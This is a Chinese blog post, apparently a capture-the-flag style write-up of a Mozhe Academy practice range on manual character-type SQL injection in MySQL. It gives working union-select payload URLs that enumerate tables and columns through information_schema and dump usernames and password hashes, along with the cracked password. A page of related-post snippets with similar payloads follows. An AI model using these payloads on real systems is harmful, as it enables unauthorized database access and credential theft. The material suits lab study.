墨者学院--SQL手工注入漏洞测试(MySQL数据库-字符型)

最新推荐文章于 2025-08-02 16:58:52 发布
最新推荐文章于 2025-08-02 16:58:52 发布
阅读量252 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 靶场记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43896364/article/details/117843281
本文详细记录了一次SQL注入攻击的过程,从发现注入点到利用注入漏洞获取数据库名、表名及字段信息,最终解密密码并成功登录。通过此案例,展示了SQL注入的常见手法和防范措施的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目意思:通过找这个页面存在的字符型sql注入获得登录需要的账号和密码,登录进去之后就能得到key。

解题步骤:查看登录url,没有思路;尝试各种姿势登录无果,有很强的过滤;点击登录框下方的公告,能够进入,url长得很像存在注入。

添加单引号报错,存在注入

http://219.153.49.228:48295/new_list.php?id=tingjigonggao%27

order by 判断字段数,一共四个字段

修改id后的参数使其报错(不然只会执行正确的id查询语句),然后联合查询四个字段,2,3能够显示在页面上

替换2为database(),查询到数据库名mozhe_discuz_stormgroup

替换database()为其他的语句爆破表名,得到表名notice,stormgroup_member

http://219.153.49.228:48295/new_list.php?id=tingjigongga%27%20union%20select%201,group_concat(table_name),version(),4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_discuz_stormgroup%27--+

继续替换语句爆破stormgroup_member中的列名,得到列名id,name,password,status

http://219.153.49.228:48295/new_list.php?id=tingjigongga%27%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20column_name=%27stormgroup_member%27--+

读取name和password里面的字段,这里记得使用group_concat因为name和password都不止一个字段,读出来的第二个password值才是有用的密码

http://219.153.49.228:48295/new_list.php?id=tingjigongga%27%20union%20select%201,group_concat(name),group_concat(password),4%20from%20stormgroup_member--+

得到name为mozhe,password为md5加密值313a4d42278b12895982f8923ba9bdab

解密得到明文为470339,登录之后就能拿到key

 

 

墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2388
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
m0_73681638的博客
06-16 419
通常 Sql 注入漏洞分为 2 种类型:数字型,字符型。数字型判断:在加载好的Url 地址中输入and 1=1,页面依旧运行正常,继续进行下一步。断网页是否存在sql注入使用单引号判断法:在参数后面加上单引号, 原因为无论字符型还是整型都会 因为单引号个数不匹配而报错。使用火狐插件—hackbar,加载出当前界面的url,使用单引号判断法,页面返回错误,存在 Sql 注 入。
MySQL注入中的一些储备知识
rane的博客
03-17 156
以Less-1为例 Less-1中存在SQL注入的语句:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 首先我们可以用id=1’来初步判断有没有SQL注入漏洞,出现了类似 You have an error in your SQL syntax; check the manual that corresponds to your MySQL...
SQL手工注入漏洞测试(MySQL数据库-字符型)-墨者
weoptions的博客
12-01 2416
———靶场专栏———分享我的解题过程
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
Sa1nZen的博客
08-24 296
SQL手工注入漏洞测试MySQL数据库-字符型
sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_75178803的博客
04-15 1095
猜解列名字段数(数量) order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来,我们在id=1后面随意输入一些东西。order by 4,页面正常。order by 1,网站正常。order by 5,页面错误。文章基于小迪sql注入的复现。页面错误,说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。
墨者靶场SQL手工注入漏洞测试(MySQL数据库-字符型)
zyh1588的博客
11-01 374
小白回顾墨者靶场手工注入
墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_59151303的博客
07-22 391
id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member'--+我们进行布尔判断输入1=1和1=2,发现页面不一样,说明我们输入的参数被带入到了数据库执行,通过判断可以发现本题是整数型注入。一、打开网站,可以发现可以登陆,还可以点击公告。
sql注入(2) 墨者学院SQL手工注入漏洞测试MySQL数据库-字符型
c10udz的博客
04-12 4795
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型
Fisher
12-02 796
写在前面: 最近准备从头再来过一遍sql,所以开始刷墨者学院的题目。 这是一道最简单的字符型 联合注入题目 目的:拿到用户与密码 首先寻找注入点,我们发现在维护界面存在id字段可能存在注入。 1.找闭合字符 首先尝试寻找闭合字符,当输入‘时界面加载正确 可能是’,接着测试 and 1=1 界面正确,and1=2 界面错误 没错说明确实闭合字符是单引号。 当然需要–+起到闭合后面闭合字符的作用。 接下来用order by 判断有多少列 order by 1时正确 order by 5 时错误说明共4列
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型)
2303_81096390的博客
08-02 563
进入靶场环境,点击登录框下面的那一串流动的字符进入具体的注入点页面查看url,发现有可变的参数?id=,此处为字符型注入sql注入分为字符型注入和数字型注入,两者有什么区别呢,简单来说就是字符型注入需要闭合,而数字型注入不需要闭合具体解释:为什么字符型需要闭合,数字型不需要?
WF6.0Datasheet-2010-4-8.pdf
08-06
WF6.0Datasheet-2010-4-8.pdf
mmpose-main.zip
08-06
mmpose-main.zip
C语言课本,适合新手,大一新生可下载
08-06
最好还是提升一下自己的英语水平,因为很多书籍都是英语翻译过来的,有的甚至是日语转成英语再转成中文的,当然并没有必要学日语。等我们参加了工作、考生了研究生等会用到更多英文类书籍。
lwip-comm + dp83848驱动
08-06
在stm32f407中,利用mac + phy的方式,实现网口的驱动。最后移植到LWIP中,实现网络通信。亲测有效。
huangsisdjgslkdgjaljg 索拉卡噶数量可根据
08-06
huangsisdjgslkdgjaljg 索拉卡噶数量可根据
paho.mqtt.cpp公开
08-06
paho.mqtt.cpp公开
克而瑞研究中心:2024年前三季度中国房地产企业代建排行榜.pdf
最新发布
08-06
克而瑞研究中心:2024年前三季度中国房地产企业代建排行榜.pdf
墨者学院SQL手工注入漏洞测试(MySQL数据库)
12-29
### MySQL数据库中的SQL手工注入漏洞测试方法 #### 测试前准备 为了安全有效地进行SQL注入测试,建议在一个受控环境中操作。通常会搭建一个包含Nginx、PHP以及MySQL的靶场环境,在此环境下可以自由尝试各种攻击向量...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值